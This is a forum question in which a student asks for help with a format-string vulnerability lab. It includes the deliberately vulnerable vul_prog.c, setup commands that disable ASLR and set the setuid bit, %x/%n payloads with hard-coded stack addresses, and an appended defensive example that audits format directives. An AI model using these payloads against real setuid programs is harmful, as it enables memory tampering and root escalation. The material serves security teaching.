
First year Cybersecurity student here (I am new to a lot of things, like Linux and such)

I am having some trouble modifying a secret value in my lab. Here is what I need to do for it:

  • gcc -z execstack -o vul_prog vul_prog.c

  • sudo chown root vul_prog

  • sudo chmod +s vul_prog

Do the following successfully using a string format vulnerability:

  • Crash program

  • Print secret value secret

  • Modify secret value secret

  • Modify secret value secret with a predetermined value 0x42454546

  • Get a root shell (extra credit)

Here is the code that we are using:

```c
/*vul_prog.c*/
#include<stdio.h>
#include<stdlib.h>

#define SECRET 0x44

int main(int argc, char*argv[]) {
    char user_input[200];
    int secret;
    int a, b, c, d; /*other variables, not used here.*/

    /*getting the secret*/
    secret = SECRET;

    printf("The variable secret’s address is 0x%8x\n", (unsigned int)&secret);
    printf("The variable secret’s value is 0x%x or %d\n", (unsigned int)secret, secret);

    printf("Please enter a string\n");
    scanf("%s", user_input); /*getting a string from user*/

    /*Vulnerable place*/
    printf(user_input);
    printf("\n");

    /*Verify whether your attack is successful*/
    printf("The original secret: 0x%x or %d\n", SECRET, SECRET);
    printf("The new secret: 0x%x or %d\n", secret, secret);

    return 0;
}
```

I know what my secret value is, but I couldn't modify it. I know the commands that I have to use. I need to modify where 44 is stored at. In my case, the address is 0xbfffeb60.

```
[10/23/19]seed@VM:~/Desktop$ ./vul_prog
The variable secret’s address is 0xbfffeb60
The variable secret’s value is 0x44 or 68
Please enter a string
.%x.%x.%x.%x.%x.%x.%x.%x.%x.%x
.bfffeb64.44.b7fd6b28.b7ff37ec.0.b7fff000.bfffece4.44.2e78252e.252e7825
The original secret: 0x44 or 68
The new secret: 0x44 or 68
```

The commands I used so far:

```
sudo sysctl -w kernel.randomize_va_space=0
gcc -z execstack -o vul_prog vul_prog.c
sudo chown root vul_prog
sudo chmod +s vul_prog
```

After that, I ran the program ./vul_prog and entered a bunch of %x to get address printed out. My professor said that the code for vul_prog.c is slightly modified from the original, and my book uses the original code and it gives the steps on how to modify it by using

```
echo $(printf "\x04\xf3\xff\xbf").%x.%x.%x.%x.%x.%n > input
vul < input
```

Here's what the input file looks like after:

```
Póÿ¿.%x.%x.%x.%x.%x.%x.%x.%x.%n
```

After I run these commands, nothing changes. Then I added 3 more of ".%x" and %n at the end and still nothing. When I try to do it with only

```
.%x.%x.%x.%x.%x.%x.%x.%x.%n
```

it will give me a segmentation error.

I tried emailing him today in the morning to ask him if I could meet him in his office and show him what I am doing wrong, and he hasn't responded yet, so I am hoping to get some more guidance from anyone who is an expert in his field.

I will add more information if needed.

EMMJAY
  • Now edit your Q to show what is in the file `input`. When you look at that, does it make sense vs the `printf` cmd used to produce it? (I'm thinking it doesn't ;-) ). Saw the last lines of your post. I am **not** an expert. Try looking at https://security.stackexchange.com help and see if your Q is appropriate to post there but **don't** crosspost! Good luck. – shellter Oct 23 '19 at 17:44
  • @shellter thank you – EMMJAY Oct 23 '19 at 17:44
  • Try changing to `echo $(printf ".%x.%x.%x.%x.%x.%n", "\x04\xf3\xff\xbf") > input` You may need to separate the values, i.e. `"\x04" "\xf3" "\xff" "\xbf"` or maybe something else. That's probably all I can help with and I am busy the rest of this week. Good luck. – shellter Oct 23 '19 at 18:03

0 Answers
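The lab's `printf(user_input)` call lets the input act as the format string, so every directive in it consumes a stack word as an argument and `%n` stores through one. The following is an added example, not part of the original post or the lab's code: it counts the directives an untrusted string would trigger and shows the corrected call that prints the input purely as data. The names `audit_format` and `print_untrusted` are hypothetical helpers chosen for illustration.

```c
/* Added example (hypothetical helpers, not from the lab): audit an untrusted
 * string for printf conversion specifications, then print it only as data. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

struct fmt_audit {
    int conversions;  /* directives that would consume a variadic argument */
    int star_args;    /* extra int arguments consumed by '*' width/precision */
    int writes;       /* %n directives: printf stores a count through a pointer */
};

/* Walk the string the way printf does: '%', optional "N$", flags, width,
 * precision, length modifier, then the conversion character. */
struct fmt_audit audit_format(const char *s)
{
    struct fmt_audit r = {0, 0, 0};
    while ((s = strchr(s, '%')) != NULL) {
        s++;
        if (*s == '%') { s++; continue; }               /* literal percent sign */
        const char *p = s;
        while (isdigit((unsigned char)*p)) p++;
        if (p > s && *p == '$') s = p + 1;              /* positional form %N$ */
        s += strspn(s, "-+ #0'");                       /* flags */
        if (*s == '*') { r.star_args++; s++; }
        else while (isdigit((unsigned char)*s)) s++;    /* width */
        if (*s == '.') {
            s++;
            if (*s == '*') { r.star_args++; s++; }
            else while (isdigit((unsigned char)*s)) s++; /* precision */
        }
        s += strspn(s, "hlLqjzt");                      /* length modifiers */
        if (*s == '\0') break;                          /* truncated directive */
        if (*s == 'n') r.writes++;
        if (strchr("diouxXeEfFgGaAcspn", *s)) r.conversions++;
        s++;
    }
    return r;
}

/* Hardened replacement for printf(user_input): the input is only ever an
 * argument, never the format, so no directive in it is interpreted. */
int print_untrusted(const char *user_input)
{
    return printf("%s\n", user_input);
}
```

Compiling the lab source with `gcc -Wformat -Wformat-security` also flags the `printf(user_input)` line, and bounding the read with `scanf("%199s", user_input)` keeps the input inside the 200-byte buffer.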